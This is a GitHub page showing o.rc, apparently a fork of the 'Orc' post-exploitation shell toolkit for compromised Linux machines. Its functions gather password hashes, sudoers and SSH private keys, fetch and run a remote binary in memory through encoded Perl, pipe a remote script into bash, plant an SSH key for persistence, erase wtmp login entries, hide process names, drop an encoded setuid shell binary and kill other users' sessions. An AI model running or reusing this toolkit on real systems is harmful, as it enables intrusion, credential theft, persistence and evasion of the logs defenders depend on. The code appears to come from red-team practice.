forked from zMarch/Orc
-
Notifications
You must be signed in to change notification settings - Fork 0
/
o.rc
532 lines (485 loc) · 16.4 KB
/
o.rc
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
#!/bin/sh
# o.rc
OVERSION="0.4"
# NOTES
# new features! see readme/gethelp
# all the non-POSIX for loops have been removed
# all the SIGs in trap changed
# aliasing echo to /bin/echo to get around POSIX echo having no flags
# removed the non-POSIX [[ stuff ]]
# curl and dig now have wget and host as backups
# ipcalc should now be optional
# support for ip instead of ifconfig and arp
memfda=$(cat << EOF
IyEvdXNyL2Jpbi9lbnYgcGVybAp1c2Ugd2FybmluZ3M7CnVzZSBzdHJpY3Q7CgokfD0xOwoKbXkgJG5hbWUgPSAiIjsKbXkgJGZkID0gc3lzY2FsbCgzMTksICRuYW1lLCAxKTsKaWYgKC0xID09ICRmZCkgewoJZGllOwp9CgpwcmludCAiZmQgJGZkXG4iOwoKb3BlbiAobXkgJEZILCAnPiY9Jy4kZmQpIG9yIGRpZTsKc2VsZWN0ICgoc2VsZWN0KCRGSCksICR8PTEpIFswXSk7CgpwcmludCAkRkggcGFjayBxL0gqLywgcS8K
EOF
)
memfdb=$(cat << EOF
cHJpbnQgImRvbmVcbiI7CmV4ZWN7Ii9wcm9jLyQkL2ZkLyRmZCJ9ICJ0ZXN0IiwgIiIsICIiIG9yIGRpZTsK
EOF
)
alias 'echo'='/bin/echo'
trap "rm -rf /dev/shm/.q" EXIT TERM INT
# Creates a copy of this scipt in variable backup
# Should be start like "ENV=o.rc sh -i".
backup=""
if [ -r "$BASH_SOURCE" -a ! -r "$ENV" ]; then
# Script was started in bash via source.
ENV=$BASH_SOURCE
fi
if [ -r "$ENV" ]; then
backup=`cat $ENV`
# Convert to absolute file name for later use.
ENV=$(realpath "$ENV")
fi
NHOME=""
getdbus() {
echo "Dbus services for system:"
dbus-send --system --dest=org.freedesktop.DBus --type=method_call --print-reply /org/freedesktop/DBus org.freedesktop.DBus.ListNames
echo "Dbus services for session:"
dbus-send --session --dest=org.freedesktop.DBus --type=method_call --print-reply /org/freedesktop/DBus org.freedesktop.DBus.ListNames
echo "See https://github.com/taviso/dbusmap for additional dbus auditing!"
}
getsec() {
echo "Let's see if there are any defences."
selinuxenabled >/dev/null 2>/dev/null
if echo $? | grep -q 0;
then echo "SELinux is enabled."
fi
type aa-status >/dev/null 2>/dev/null
if echo $? | grep -q 0;
then echo "AppArmor is probably installed."
fi
if cat /proc/self/status | grep -q PaX; then
echo "GrSec and PaX live here."
fi
}
log2outp() {
# Runs a command and writes output to files in $OUTP.
# arguments: basename command command-arguments
# outputs: pipes stdout into $OUTP/basename.txt
# pipes stderr into $OUTP/basename.err
# logs basename and command call in $OUTP/log.txt
if [ ! -d "$OUTP" ]; then
echo 'output directory not defined or prepared'
return 1
fi
if [ $# -lt 1 ]; then
echo 'missing basename of the output files'
return 1
fi
echo "$@" >> "$OUTP/log.txt"
local basename=$1
shift
if [ $# -lt 1 ]; then
echo 'missing command to execute'
return 1
fi
"$@" >> "$OUTP/$basename.txt" 2>> "$OUTP/$basename.err"
}
getinfo() {
echo "Gathering useful command output."
echo "Find it in $HOME/f.tar.xz"
OUTP=$HOME/files/
mkdir --mode 700 $OUTP
log2outp passwd getent passwd
log2outp uname uname -a
log2outp ps ps -weFH
log2outp w w
log2outp last last -i
log2outp uptime uptime
log2outp id id
log2outp date date
log2outp cpuinfo cat /proc/cpuinfo
log2outp free free -g
log2outp route route -n
log2outp hosts cat /etc/hosts
log2outp resolve cat /etc/resolv.conf
log2outp rpcinfo rpcinfo
log2outp lsmod lsmod
log2outp lsusb lsusb
log2outp mount mount
log2outp df df
log2outp user_crontab crontab -l
if hash ifconfig 2>/dev/null; then
log2outp ifconfig ifconfig -a
else
log2outp ifconfig ip link
fi
log2outp netstat netstat -peanut
if [ "$EUID" = "0" -o -O "/root" ]; then
# Variable EUID is defined in the bash.
# Check EUID of /root works in dash (and in bash).
log2outp shadow getent shadow
log2outp ssh_keys find /home/ -name id_rsa
log2outp sudoers cat /etc/sudoers
log2outp crontab cat /etc/crontab
log2outp iptables iptables -L
log2outp secure cat /var/log/secure
log2outp roothist cat /root/.bash_history
log2outp sshd_config cat /etc/ssh/sshd_config
log2outp root_dir ls -al /root/
#inelegant hack
log2outp netstat netstat -peanut
if hash getsebool 2>/dev/null; then
log2outp sellinux getenforce
log2outp sellinux getsebool -a
log2outp sellinux sestatus
fi
fi
# Stores all log files in one compressed tar archive.
tar -cJf $HOME/f.tar.xz $OUTP
if [ $? -gt 0 ]; then
# maybe the tar internal xz fail. Try an external xz compression.
tar -cf - $OUTP | xz -c -9 > $HOME/f.tar.xz
fi
if [ $? -gt 0 ]; then
# maybe xz command failed. Try the old gzip inside tar
tar -czf $HOME/f.tar.gz $OUTP
fi
# Remove the single log files. Keep only the archive file.
rm -rf $OUTP
}
timedshell() {
echo "scheduling a reverse shell to launch later..."
}
listusers() {
# Listing users in passwd with login shells.
# Reject shells named *nologin or *false as valid shells.
getent passwd |
awk -F ':' '
NF==1 && $1 !~ /^#|nologin$|false$/ {shells[$1]=1}
$7 in shells {print $1}' /etc/shells -
}
getusers() {
echo "Listing valid users with shells."
listusers
}
getuservices() {
echo "Listing all running services with non-user accounts in passwd."
{ listusers; ps --no-header -weFH; } |
awk 'NF==1 {users[$1]=1}
NF>1 && !($1 in users) {print}'
}
getspec() {
echo -ne "RAM available: "
free -hm | tr '\n' ' ' | awk '{ print $8 }'
echo -ne "CPU model:"
grep name /proc/cpuinfo | head -n 1 | awk -F ":" '{print $2}'
echo -ne "Number of cores: "
grep -c processor /proc/cpuinfo
echo -ne "Disk usage:"
df -h
}
getidle() {
# List all ptys and their idle times accurately.
# Arguments : none
# Globals : our_pty could contain the number of our PTY
export our_pty=$(tty | cut -d '/' -f 4)
stat /dev/pts/* -c '%n %X %U' |
awk -v now=$(date +%s) '$1 ~ /\/[0-9]+$/ {
gsub( /[^0-9]/, "", $1 )
list[$1]="PTY " $1 " is " now-$2 " seconds idle and owned by " $3
if( $1==ENVIRON["our_pty"] ) list[$1]=list[$1] " ** this is us **"}
END {for(i in list) print list[i]}'
# reminder: do not use gawk functions, e.g. systime
}
srm() {
shred -vzfun 2 $1
}
qssh() {
if tty | grep -q "not"; then
echo '#!/bin/bash' > /dev/shm/.q/.k
echo "echo $1" >> /dev/shm/.q/.k
chmod a+x /dev/shm/.q/.k
shift
DISPLAY="" SSH_ASKPASS="/dev/shm/.q/.k" ssh -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -T $@
else
echo "You've got a tty. You can't use qssh."
fi
}
qsu() {
echo '#!/bin/bash' > /dev/shm/.q/.c
echo "echo $1" >> /dev/shm/.q/.c
chmod a+x /dev/shm/.q/.c
shift
SUDO_ASKPASS=/dev/shm/.q/.c sudo -A "$@"
rm /dev/shm/.q/.c
}
memexec() {
memfile=$(curl -s $1 | od --endian=big -An -x | tr -d ' ' | tr -d '\n')
finalmem=$(echo $memfda | base64 -d)
finalmem=${finalmem}$(echo -ne "$memfile/ or die;\n")
finalmem=${finalmem}$(echo $memfdb | base64 -d)
echo "$finalmem" | perl
}
getpty() {
SHELL=$(command -v sh)
#echo "$backup" > "$ENV"
if [ -r "$ENV" ]; then
ENV="$ENV" script -c sh /dev/null
else
echo "ENV not defined. Can not start script."
fi
}
getsuspect() {
#ask and ye shall receive
#this janky, awful shortcut
curl https://raw.githubusercontent.com/zMarch/suspect/master/suspect.sh | bash
}
keyinstall() {
touch /dev/shm/.q/.ssh
touch -r /
sshkey="ssh-rsa [YOUR KEY HERE] `whoami`@`hostname`"
echo $sshkey >> $NHOME/.ssh/authorized_keys
}
psgrep() {
ps -weFH | grep $1 | grep -v grep
}
getescape() {
ps --no-header aux | awk -F" " '{print $1" "$2}' | grep "^`id -u`"i | awk '{print $2}' | tr ' ' '\n' | while read i; do
if ls -di --color=never "/proc/$i/root/" | grep -qe "^2\ "; then
echo "process $i seems to be outside the jail..."
fi
done
}
getjail() {
ttt=0
echo "Checking to see if we're in one giant simulation..."
if ls -di --color=never / | grep -vqe "^2.*/$"; then
TTT=1
echo "We're in a chroot."
fi
if cat /proc/cpuinfo | grep -qi "hypervisor"; then
echo "Virtual machine!"
TTT=1
fi
if dmesg | grep -qi "hypervisor"; then
echo "Virtual machine!"
TTT=1
fi
if dmesg | grep -qi "vboxvideo"; then
echo "Virtual machine! (Virtualbox)"
TTT=1
fi
if echo $TTT | grep -vq "1"; then
echo "Bare metal!"
fi
}
portscan() {
porta="21 22 23 80 443 8080 8443 129 445 3389 3306"
echo "Starting portscan..."
echo $porta | tr ' ' '\n' | while read i;do
bash -c "echo '' > /dev/tcp/$1/$i" 2>/dev/null
if echo $? | grep -q 0; then
echo "Host $1 port $i open"
fi
done
}
fpssh() {
ssh-keyscan $1
}
getip() {
#we use akamai and google here because they're gonna look less dodgy in SOC's lolgs
echo "Attempting to get IP..."
echo -ne "HTTP says: "
if hash curl>/dev/null; then
curl -k https://whatismyip.akamai.com
echo -ne "\n(used curl)"
else
wget -qO- --no-check-certificate https://whatismyip.akamai.com
echo -ne "\n(used wget)"
fi
echo ""
echo -ne "DNS says: "
if hash dig>/dev/null; then
dig TXT +short o-o.myaddr.l.google.com @ns1.google.com | tr -d \"
echo -ne "(used dig)\n"
else
host -t txt o-o.myaddr.l.google.com ns1.google.com | grep descriptive | awk -F ' ' '{print $4}' | tr -d '"' | tr -d "\n"
echo -ne "(used host)\n"
fi
}
prochide() {
# Execute a program hiden by a long program name.
# arguments: program to execute with optional arguments.
# methode : use the longest command line of the current running
# processes as name of the program to start.
ARGS="$@"
LONGARG=$(ps --no-header -wweo cmd | awk 'length(X)<length {X=$0}; END {print X}')
bash -c "exec -a \"$LONGARG\" $ARGS"
}
getnet() (
#i'm sorry
sorry(){
#this needs work
if hash ipcalc 2>/dev/null; then
echo "Pinging IPs in the background..."
if hash ifconfig 2>/dev/null; then
valid=$(seq -f $(ipcalc -n --minaddr --maxaddr `ifconfig | grep inet | grep -i broadcast | awk -F ' ' '{print $2" "$4}'` | awk -F "=" '{print $2 " "}' | sed s/0/%g/ |tr -d '\n' | awk -F'.' '{print $1"."$2"."$3"."$4" "$7" "$10}' | awk -F " " '{print $1" "$3" "$5}' | tr -d '\n'))
echo $valid | tr ' ' '\n' | while read i;do
if ping -c1 -q $i | grep -q "\ 0%"; then
echo $i is alive >> /dev/shm/.q/ips
fi
done
else
valid=$(seq -f $(ipcalc -n --minaddr --maxaddr `ip addr show | grep inet | grep -i "broadcast\|brd" | awk -F ' ' '{print $2}'` | awk -F "=" '{print $2 " "}' | sed s/0/%g/ |tr -d '\n' | awk -F'.' '{print $1"."$2"."$3"."$4" "$7" "$10}' | awk -F " " '{print $1" "$3" "$5}' | tr -d '\n'))
echo $valid | tr ' ' '\n' | while read i;do
if ping -c1 -q $i | grep -q "\ 0%"; then
echo $i is alive >> /dev/shm/.q/ips
fi
done
fi
else echo "No ipcalc. Checking if we've got a /24 and then pinging the first one..."
if hash ifconfig 2>/dev/null; then
if ifconfig | grep -q "255.255.255.0"; then
INPUT=$(seq -f `ifconfig | grep inet | grep -i broadcast | grep -v inet6 | grep "255.255.255.0" | head -n1 | awk -F " " '{print $2}' | awk -F '.' '{print $1"."$2"."$3".%g 1 254"}'`)
echo $INPUT | tr ' ' '\n' | while read i;do
if ping -c1 -q $i | grep -q "\ 0%"; then
echo $i is alive >> /dev/shm/.q/ips
fi
done
else
if ip addr show | grep -E '/24*.brd'; then
INPUT=$(seq -f `ip addr show | grep brd |grep "/24" | head -n 1| awk -F " " {'print $2'} | awk -F '.' '{print $1"."$2"."$3".%g 1 254"}'`)
echo $INPUT | tr ' ' '\n' | while read i;do
if ping -c1 -q $i | grep -q "\ 0%"; then
echo $i is alive >> /dev/shm/.q/ips
fi
done
fi
fi
fi
fi
}
valida=""
valid=""
echo "Let's see what we can find on the network..."
echo "ARP table:"
if hash arp 2>/dev/null; then
arp -na | grep ether |awk -v FS="(\\\(|\\\))" '{print $2}'
else
ip neigh show | awk -F " " '{print $1}'
fi
echo "Pinging broadcast."
echo "Please wait..."
if hash ifconfig 2>/dev/null; then
ping -c3 -i 10 -b $(ipcalc -b `ifconfig | grep inet | grep -i broadcast | awk -F ' ' '{print $2" "$4}'` | awk -F "=" '{print $2 " "}' | tr -d "\n")
else ping -c3 -i 10 -b $(ip addr show | grep inet | grep brd | awk -F ' ' '{print $4}')
fi
echo "Broadcast ping is done."
echo "Pulling known hosts for your user and writing to /dev/shm/.q/kh..."
cat $NHOME/.ssh/known_hosts | awk -F ' ' '{print $1}' > /dev/shm/.q/kh
sorry &
)
wiper() {
cat /var/log/wtmp | utmpdump | grep -v "$1" > /dev/shm/.q/.l
touch -r /var/log/wtmp /dev/shm/.q/.l
cat /dev/shm/.q/.l | utmpdump -r -o /var/log/wtmp
touch -r /dev/shm/.q/.l /var/log/wtmp
}
getrel() {
# Prints the OS name from the release file.
# arguments: none
# output : print to stdout
# method : Cuts the name from lines like PRETTY_NAME="name".
awk -F= 'toupper($1)~/PRETTY/ {gsub(/\"/,"",$2); print $2}' /etc/*release
}
hangup() {
echo "This is seriously rude..."
echo "Terminating PTS/$1"
OWNER=$(stat -c '%U' /dev/pts/$1)
SSH_PID=$(pgrep -a sshd | grep pts/$1 | cut -d ' ' -f 1)
echo "Owner of PTS is $OWNER"
echo "SSH PID is $SSH_PID"
echo "Segmentation Fault." > /dev/pts/$1
sleep 2
kill -9 $SSH_PID
}
getenum() {
echo "Doing some basic listing of the usual suspects..."
echo -ne "Kernel: "
uname -rv
echo -ne "glibc: "
`ldd $(command -v id) | grep libc.so | awk -F " " '{print $3}'` | grep -i version | grep -v crypt
echo -ne "dbus: "
dbus-daemon --version | grep Daemon
echo -ne "Init system is: "
ps -p 1 | grep -v CMD| awk -F " " '{ print $4 }'
}
gethelp() {
echo "A probably non-comprehensive list of functionality in Orc v$OVERSION."
echo "[*] getenum - get kernel, glibc, and dbus versions"
echo "[*] getinfo - create a tar.xz of useful command output"
echo "[*] getrel - attempt to get the OS release file."
echo "[*] getip - get external IP from akamai and google (HTTP and DNS)"
echo "[*] getjail - check if we're in a chroot/VM"
echo "[*] getsec - check if the big three security MAC programs are around"
echo "[*] getusers - pull all users with a shell"
echo "[*] getpty - pop a pty with script"
echo "[*] getidle - list all ptys and their idle times accurately."
echo "[*] getnet - attempt to enumerate hosts on the local network with ping"
echo "[*] getsuspect - pull my suspect tool from github."
echo "[*] getspec - grab some hardware information."
echo "[*] getuservices - list all running services with non-user accounts in passwd"
echo "[*] getescape - attempt to escape chroot via bad privs on the /proc/ filesystem."
echo "[*] getdbus - list all dbus services."
echo "[*] memexec - execute a binary in-memory from a webserver - memexec [full URI] (x64 only)"
echo "[*] portscan - run a portscan against common ports - portscan [host]"
echo "[*] prochide - run a program with $0 changed to the longest entry in ps - prochide [program + args]"
echo "[*] srm - alias for secure shredding of files."
echo "[*] qsu - sudo without a tty - qsu [password] [normal arguments]"
echo "[*] qssh - ssh without a tty - qssh [password] [normal arguments]"
echo "[*] wiper - remove entries from wtmp - wiper [string to grep out]"
echo "[*] fpssh - pull ssh remote host fingerprints - fpssh [host]"
echo "[*] stomp - alias for touch -r (needs arguments)"
echo "[*] tools - check for common tools"
echo "[*] dropsuid - drop tiny suid shell - dropsuid > [file]"
echo "[*] hangup - terminate someones PTS by killing their SSH process. Very loud, DO NOT USE. - hangup [PTS NUMBER]"
}
mkdir /dev/shm/.q
cd /dev/shm/.q
alias 'stomp'='touch -r'
alias 'tools'='type dig perl python gcc nc openssl wget strace gcore nmap gdb curl wget tcpdump'
alias 'dropsuid'='echo "f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAVIAECDQAAAAAAAAAAAAAADQAIAABAAAAAAAAAAEAAAAA
AAAAAIAECACABAgHAAAABwAAAAUAAAAAEAAA6AEAAADpWJCDwAxQw7sAAAAA6bgXAAAAzYDrAem7
iIAECLgLAAAAMckx0usB6THJzYAAAC9iaW4vc2g=" | base64 -d'
alias 'psfull'='ps -weFH'
alias 'listener'='netstat -peanuto'
alias 'netgrep'='netstat -peanuto | grep'
alias 'getp'='getent passwd'
alias 'psql'='PSQL_HISTORY=/dev/null psql'
alias 'ssh'='ssh -T -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no'
alias 'less'='LESSHISTFILE=/dev/null less'
alias 'wget'='wget --no-hsts'
alias 'vim'='vim -ni NONE'
alias 'mysql'='MYSQL_HISTFILE=/dev/null mysql'
unset HISTFILE
HISTSIZE=0
umask 002
ulimit -c 0
echo "=========== Info ==========="
echo "Short kernel info: "
uname -rni
echo "IP address on the network: "
if hash ifconfig 2>/dev/null; then
ifconfig | grep inet | grep -v inet6 | awk -F " " '{ print $2 }' | grep -v 127 | grep -v "::1$"
else
ip addr show | grep inet | grep -v inet6 | awk -F " " '{ print $2 }' | grep -v 127 | grep -v "::1$"
fi
echo -ne "We are uid "
id -uz;echo -ne " - "; echo -ne "(";whoami | tr -d '\n';echo ")"
echo -ne "Machine has been "
uptime -p
if [ -f /etc/machine-id ]; then
echo -ne "Unique Machine ID: "
cat /etc/machine-id
fi
echo "============================"
echo "=== Welcome to Orc Shell ==="
echo "Run gethelp to see a list of commands."
echo "/dev/shm/.q should be deleted upon exit."
PS1='$USER'"@`hostname`:"'$PWD'"$ "
HOME="/dev/shm/.q"
NHOME=$(getent passwd | grep `id -u` | cut -d: -f 6)
#rm $ENV